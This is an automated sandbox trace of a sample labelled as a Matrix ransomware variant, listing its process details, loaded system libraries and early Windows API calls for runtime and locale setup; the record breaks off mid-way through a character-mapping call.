# Flog Txt Version 1 # Analyzer Version: 2.4.0 # Analyzer Build Date: Jul 24 2018 18:08:56 # Log Creation Date: 30.08.2018 21:34:45.601 Process: id = "1" image_name = "2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe" filename = "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe" page_root = "0x7ea16600" os_pid = "0xa78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 137 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 138 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 139 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 140 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe" filename = "\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe") Region: id = 141 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 142 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 143 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 144 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 145 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 146 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 147 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 148 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 149 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 150 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 151 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 152 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 153 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 154 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 155 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 156 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 157 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 158 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 159 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 160 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 161 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 162 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 163 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 164 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 165 start_va = 0x11a0000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 166 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 167 start_va = 0x1320000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 168 start_va = 0x11a0000 end_va = 0x127efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 169 start_va = 0x1310000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 170 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 171 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 172 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 1 os_tid = 0xa7c [0085.842] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x75b43cc0, dwHighDateTime=0x1d440a9)) [0085.842] GetCurrentProcessId () returned 0xa78 [0085.842] GetCurrentThreadId () returned 0xa7c [0085.843] GetTickCount () returned 0x2249f [0085.843] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=14263176516) returned 1 [0085.843] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0085.843] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0085.844] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0085.844] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0085.844] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0085.844] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0085.844] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0085.845] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0085.845] GetCurrentThreadId () returned 0xa7c [0085.845] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13107d0)) [0085.845] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0085.845] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0085.845] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0085.845] SetHandleCount (uNumber=0x20) returned 0x20 [0085.845] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0085.845] GetEnvironmentStringsW () returned 0x20fb40* [0085.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0085.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13111f8, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0085.846] FreeEnvironmentStringsW (penv=0x20fb40) returned 1 [0085.846] GetLastError () returned 0x5 [0085.846] SetLastError (dwErrCode=0x5) [0085.846] GetLastError () returned 0x5 [0085.846] SetLastError (dwErrCode=0x5) [0085.846] GetLastError () returned 0x5 [0085.846] SetLastError (dwErrCode=0x5) [0085.846] GetACP () returned 0x4e4 [0085.846] GetLastError () returned 0x5 [0085.846] SetLastError (dwErrCode=0x5) [0085.846] IsValidCodePage (CodePage=0x4e4) returned 1 [0085.846] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0085.846] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0085.846] GetLastError () returned 0x5 [0085.847] SetLastError (dwErrCode=0x5) [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0085.847] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0085.847] GetLastError () returned 0x5 [0085.847] SetLastError (dwErrCode=0x5) [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ") returned 256 [0085.847] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0085.847] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0085.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x5d\x82\x40\x27\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0085.847] GetLastError () returned 0x5 [0085.847] SetLastError (dwErrCode=0x5) [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ") returned 256 [0085.847] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0085.848] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0085.848] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\x